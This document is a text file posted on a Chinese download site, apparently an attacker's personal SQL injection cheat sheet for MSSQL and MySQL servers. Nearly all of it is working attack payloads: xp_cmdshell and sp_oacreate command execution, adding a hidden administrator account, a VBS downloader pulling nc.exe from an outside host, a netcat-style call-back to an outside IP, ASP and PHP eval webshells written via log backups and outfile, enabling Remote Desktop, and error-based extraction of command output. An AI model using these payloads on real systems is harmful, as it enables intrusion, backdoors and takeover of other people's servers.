⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 sql.txt.txt

📁 我没有多少时间描述了
💻 TXT
字号:
🔍 
[mysql inject to get path]
benchmark( 500000000, md5( 'test' ) )

[枚举盘符]
fsutil.exe fsinfo drives

[sa单语句cmdshell]
) and 1=(select top 1 * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master.dbo.xp_cmdshell ''net user|more %2B1''')) and (1=1

[cmd回显特定行]
dir|more +n

[404_cmd]
';exec master..xp_cmdshell 'ren C:\Windows\Help\iisHelp\common\404b.htm C:\Windows\Help\iisHelp\common\404b.htm.bak'--
';exec master..xp_cmdshell 'systeminfo >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ping 127.1 -n 5'--
';exec master..xp_cmdshell 'netstat -an >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'netstat -an >C:\Winnt\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'net start >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ver >C:\Winnt\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber >C:\Windows\Help\iisHelp\common\404b.htm'--

';use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c systeminfo >C:\Windows\Help\iisHelp\common\404b.htm',0,true;--

';exec master..xp_cmdshell 'copy C:\Windows\Help\iisHelp\common\404b.htm.bak C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'del C:\Windows\Help\iisHelp\common\404b.htm.bak'--

[404_getpath]
';exec master..xp_cmdshell 'ren C:\Windows\Help\iisHelp\common\404b.htm C:\Windows\Help\iisHelp\common\404b.htm.bak'--
';exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'copy 2000.reg C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'regedit /s 2000.reg'--
';exec master..xp_cmdshell 'iisreset /reboot >C:\Windows\Help\iisHelp\common\404b.htm'--

';exec master..xp_cmdshell 'copy C:\Windows\Help\iisHelp\common\404b.htm.bak C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'del C:\Windows\Help\iisHelp\common\404b.htm.bak'--


[SQL2005导入文本文件]
BULK   INSERT POP..Booty
FROM   'C:\Inetpub\Data\POP3.LST'
WITH   ( 
        FIELDTERMINATOR   =';', 
        ROWTERMINATOR   =   '\n'
)

[Add_sa]
;exec master.dbo.sp_addlogin ice;-- 
;exec master.dbo.sp_addsrvrolemember ice,sysadmin--
;exec master.dbo.sp_password null,ice,ice;--
    旧密码,新密码,登录名

[vpn_拨入_cmd]
netsh ras set user ice permit

[search injec]
%' and 1=1 and '%'='

[xp_cmdshell]
';exec master..xp_cmdshell "ver"--
';exec master..xp_cmdshell "ping 127.1 -n 10"--
';exec master..xp_cmdshell "telnet www.civil.tsinghua.edu.cn 21"--
';exec master..xp_cmdshell "net1 user ice user1234!@#$ /add"--
';exec master..xp_cmdshell "net1 user ice user1234 /add"--
';exec master..xp_cmdshell "net1 localgroup administrators ice /add"--
';exec master..xp_cmdshell [net1 localgroup "remote desktop users" ice /add]--
';exec master..xp_cmdshell [D:\JWC_Server\img\door.exe 210.77.30.17 2828]-- 
';exec master..xp_cmdshell 'echo ^<%eval request(^"#^")%^> >c:\inetpub\wwwroot\little.asp'--
';exec master..xp_cmdshell 'echo 1 >d:\xyzp\1.txt'--

[VBS Downloader]
';exec master..xp_cmdshell "echo Set x= createObject(^""Microsoft.XMLHTTP^""):x.Open ^""GET^"",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^""ADODB.Stream^""):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\wget.vbs"--
echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >wget.vbs
';exec master..xp_cmdshell "c:\wget.vbs http://sis.ruc.edu.cn/nc.exe c:\nc.exe"--

[OA_Create]
';use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c net1 user ice user1234 /add',0,true;--

[Job]
';exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'--
';use msdb exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net1 user ice user1234 /add' exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'--

[SQL 2000 恢复存储过程]
';exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
';use master dbcc addextendedproc('sp_OACreate','odsole70.dll')--

[SQL 2005 开启sp_oacreate]
';exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

[SQL 2005 开启OpenRowset/OpenDatasource]
';exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure--

';exec sp_configure 'show advanced options',0;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure--
[SQL 2005 恢复存储过程]
';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
过单引号
;declare @z nvarchar(4000) set @z=0x730068006F007700200061006400760061006E0063006500640020006F007000740069006F006E007300;declare @b nvarchar(4000) set @b=0x780070005F0063006D0064007300680065006C006C00;EXEC sp_configure @z,1;RECONFIGURE;EXEC sp_configure @b,1;RECONFIGURE;--

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

[DBO BACKUP]

databasename=zgly

';alter database "china-pipe" set RECOVERY FULL--
';create table boyofbit (a image)--
';backup log "china-pipe" to disk = 'C:\amethyst' with init--
';insert into boyofbit (a) values ('<%Execute(request("#"))%>')--
';insert into boyofbit (a) values (0x3C256576616C20726571756573742822732229253E)--
';backup log "china-pipe" to disk = 'E:\chuban\csspw\l.asp'--
';backup log clientdata to disk =0x443A5C696E65747075625C6A6F62732E6C656564732E61632E756B5C776562726F6F745C6C6974746C652E617370--
';drop table boyofbit--

a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

[3389]
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

reg add "HKLM\SYSTEM\CurrentControlSet\Services\IPSec" /v NoDefaultExempt /t REG_DWORD /d 00000000 /f
reg query "HKLM\SYSTEM\CurrentControlSet\Services\IPSec"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp PortNumber
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp PortNumber

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

[DigitalProductId]
reg query "HKLM\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion" /v DigitalProductId

[phpmyadmin]
use mysql;
CREATE TABLE ice (cmd text NOT NULL);
INSERT INTO ice (cmd) VALUES('<?php eval(stripslashes($_REQUEST[cmd]));?>');
select cmd from ice into outfile 'D:/WebSite/templates/default/little.php';
DROP TABLE IF EXISTS ice;

[makewebtask]
';exec sp_makewebtask 'D:\magtech\web\little.asp','select''<%execute(request("SB"))%>'' '
';exec sp_makewebtask 'D:\magtech\web\little.asp','select * from boyofbit'--

[xp_cmdshell]
;DROP TABLE [boyofbit];CREATE TABLE [boyofbit]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);--
;DELETE [boyofbit];insert into [boyofbit](ResultTxt) exec master.dbo.xp_cmdshell [netstat -an];--
and (Select ResultTxt from [boyofbit] where [id]=1)=0
;DROP TABLE [boyofbit]--

';DROP TABLE [boyofbit];CREATE TABLE [boyofbit]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [boyofbit](ResultTxt) exec master.dbo.xp_cmdshell 'ipconfig';insert into [boyofbit] values ('g_over')--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 1 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 2 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 3 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 4 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 5 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 6 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 7 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 8 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 9 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 10 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--

';DROP TABLE [boyofbit]--

[dir]
';DROP TABLE NoLove;CREATE TABLE NoLove(subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)--
';DELETE NoLove;Insert NoLove exec master..xp_dirtree 'C:\',1,1--
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 1 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 2 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 3 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
';DROP TABLE NoLove--

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -